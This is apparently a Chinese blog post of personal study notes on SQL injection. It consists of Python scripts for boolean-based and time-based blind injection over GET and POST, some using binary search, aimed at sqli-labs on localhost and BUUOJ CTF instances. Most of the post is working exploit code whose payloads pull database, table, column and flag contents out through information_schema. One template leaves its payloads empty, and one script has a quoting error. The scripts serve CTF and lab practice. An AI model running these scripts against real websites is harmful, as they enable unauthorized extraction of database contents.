sql注入脚本笔记

GET型

bool盲注

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import requests
import time
url = "http://127.0.0.1/sqli-labs-master/Less-5/"
right = "You"

# 注意缩写,python缩写

def database_name():
    name = ''
    for i in range(1,100):
        for j in "abcdefghijklmnopqrstuvwxyz":# 爆flag最好用ascii码,防止漏掉特殊字符
            payload = "?id=1" and substr((select database()),%d,1)='%s'--+"% (i,j) 
            r = requests.get(url + payload)
            if right in r.text:
                name += j
                print(name)
database_name()

时间盲注

python时间函数的学习

1
2
3
4
5
6
7
8
9
10
11
12
import datetime
import time
now = datetime.datetime.now() #获取当前的时间
sleep(2)
now1 = datetime.datetime.now() #获取两秒后的时间
sec = (now1-now).seconds
   # sec为2
   # seconds获取的是仅仅是时间差的秒数,忽略微秒数,忽略天数。
   # total_seconds()是获取两个时间之间的总差。
now2 = time.time() #获取当前时间
sleep(2)
now3 = time.time()  # 不能用.seconds,因为这个是float型的
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
import requests
import time
import datetime
url = "http://127.0.0.1/sqli-labs-master/Less-9/"
def get_database_len():
    for i in range(1,20):
        payload  = "?id=1' and sleep(if(length((select database()))=%d,2,0))--+"% (i)
        start = datetime.datetime.now()
        response = requests.get(url+payload)
        end = datetime.datetime.now()
        tt = (end-start).seconds
        if tt >=2:
            print(i)
            return i
def get_database_name():
    number = get_database_len()
    name = ""
    for i in range(1,number+1): # 这个要加1,不然会少爆出一个字母
        for j in range(32,126):
            payload = "?id=1' and sleep(if(ascii(substr((select database()),%d,1))=%d,2,0))--+"%(i,j)
            start = datetime.datetime.now()
            re = requests.get(url+payload)
            end = datetime.datetime.now()
            ttt = (end - start).seconds # 这个用.seconds使其整数化
            if ttt >=2:
                name += chr(j)
                print(name)
get_database_name()

### 有个缺点,速度太慢,可以进行算法优化

POST型

bool盲注

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
import requests
import re
url = "http://127.0.0.1/sqli-labs-master/Less-13/"
def get_len_database():
    for i in range(1,25):
        payload = "admin') and length((select database()))=%d #"%(i)
        data = {"uname":payload, "passwd":"admin", "submit":"submit"}
        html = requests.post(url=url, data=data)
        if "flag.jpg" in html.text:
            print(i)
            return i
def get_name_database():
    number = get_len_database()
    print(number)
    name = ""
    for i in range(1,number+1):
        for j in range(30,130):
            payload = "admin') and ascii(substr((select database()),%d,1))=%d#"%(i,j)
            data = {"uname":payload,"passwd":"admin","submit":"submit"}
            html = requests.post(url=url, data=data)
            if "flag.jpg" in html.text:
                name += chr(j)
                print(name)
                if i == number:
                    return name
                break
def get_name_table():
    name = ""
    result = get_name_database()
    print(result)
    for i in range(1,30):
        for j in range(30,130):
            payload = "admin') and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))=%d#"%(i,j)
            data = {"uname":payload,"passwd":"admin","submit":"submit"}
            html = requests.post(url=url, data=data)
            if "flag.jpg" in html.text:
                name += chr(j)
                print(name)
get_name_table()

时间盲注

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import datetime
import requests
import time
url = "http://127.0.0.1/sqli-labs-master/Less-13/"
def get_len_database():
    for i in range(1,25):
        payload = "admin') and sleep(if(length((select database()))=%d,3,0))#"%(i)
        data = {"uname":payload, "passwd":"admin", "submit":"submit"}
        start = time.time()
        html = requests.post(url=url, data=data)
        end = time.time() # 这里好像只能同time.time()
        ttt = end-start
        if ttt >=2:
            print(i)
            return i
def get_name_database():
    number = get_len_database()
    name = ""
    for i in range(1,number+1):
        for j in range(30,130):
            payload = "admin') and sleep(if(ascii(substr((select database()),%d,1))=%d,3,0))#"%(i,j)
            data = {"uname":payload,"passwd":"admin","submit":"submit"}
            start = time.time()
            # print(data)
            html = requests.post(url=url, data=data) 
            end = time.time()
            ttt = end - start
            # print(ttt)
            if ttt >= 2:
                name += chr(j)
                print(name)
get_name_database()

# 一定要注意payload不要写错不然查错要查特别久

二分法

通过post传参的脚本

用的时候修改post参数和个数

1.1 基于异或盲注,布尔盲注等:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import requests

url = 'http://736aa374-b497-441f-9b6a-a1c91f9b182b.node4.buuoj.cn:81/login.php'
flag = ''

for i in range(1, 1000):
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        #payload = f"1' or ascii(substr(database(),{i},1))>{mid}#"    #查库
        #payload = f"1' or ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='note'),{i},1))>{mid}#"   #查表
        #payload = f"1' or ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='fl4g'),{i},1))>{mid}#"   #查列
        payload = f"1' or ascii(substr((seleCt(flag)from(fl4g)),{i},1))>{mid}#"   #查数据
        data = {
            "name":payload,
            "pass":'qwer'
        }
        response = requests.post(url, data = data)
        if 'u6216' in response.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2       
    if low != 32 :
        flag += chr(int(low))
    else:
        break
    print(flag)

1.2 基于时间盲注:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
import requests
import time

url = 'http://736aa374-b497-441f-9b6a-a1c91f9b182b.node4.buuoj.cn:81/login.php'
flag = ''

for i in range(1,1000):
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        #payload = f"1' or if(ascii(substr(database(),{i},1))>{mid},sleep(2),1)#"       #查库名
        #payload = f"1'or if(ascii(substr((seleCt(group_concat(table_name))from(information_schema.tables)where(table_schema)='note'),{i},1))>{mid},sleep(2),1)#"        #查表名
        #payload = f"1'or if(ascii(substr((seleCt(group_concat(column_name))from(information_schema.columns)where(table_name)='users'),{i},1))>{mid},sleep(2),1)#"        #查列名
        payload = f"1'or if(ascii(substr((seleCt(flag)from(fl4g)),{i},1))>{mid},sleep(2),1)#"       #查数据
        data = {
            "name":payload,
            "pass":'qwer'
        }        
        last = int(time.time())
        response = requests.post(url, data = data)
        now = int(time.time())
        if now - last > 1 :    
            low = mid + 1
        else :
            high = mid
        mid = (low + high) // 2 
    if low != 32 :
        flag += chr(int(low))
    else:
        break
    print(flag)

2.通过get传参的脚本

修改url 和 文本

2.通过get传参的脚本
修改url 和 文本

2.1 基于异或盲注,布尔盲注等:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import requests

url = "http://d98fb290-369c-4ad8-8cd5-883846041dad.node4.buuoj.cn/search.php?id="
name = ''

for i in range(1,1000):
    min = 32
    max = 128
    while min<max:
        mid = (min + max) // 2
        payload=f"1^(ascii(substr(database(),{i},1))>{mid})#"       #查库名
        #payload=f"1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),{i},1))>{mid})#"        #查表名
        #payload=f"1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='F1naI1y'),{i},1))>{mid})#"      #查列名
        #payload=f"1^(ascii(substr((select(group_concat(password))from(F1naI1y)),{i},1))>{mid})#"       #查数据
        response=requests.get(url=url+payload)
        if 'ERROR' in response.text:
            min = mid + 1
        else:
            max=mid
    if min != 32 :
        name += chr(min)
    else:
        break
    print(name)

2.2 基于时间盲注:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import requests
import time 

url = "http://d98fb290-369c-4ad8-8cd5-883846041dad.node4.buuoj.cn/search.php?id="
name = ''

for i in range(1,1000):
    min = 32
    max = 128
    while min<max:
        mid = (min + max) // 2
        payload=f" "       #查库名
        #payload=f" "        #查表名
        #payload=f" "      #查列名
        #payload=f" "       #查数据
        last = int(time.time())
        response=requests.get(url=url+payload)
        now = int(time.time())
        if now - last > 1:
            min = mid + 1
        else:
            max=mid
    if min != 32 :
        name += chr(min)
    else:
        break
    print(name)

web
#sql注入
sql注入脚本笔记
http://example.com/2023/05/11/web学习/sql注入/sql注入脚本笔记/
作者
Englobe
发布于
2023年5月11日
许可协议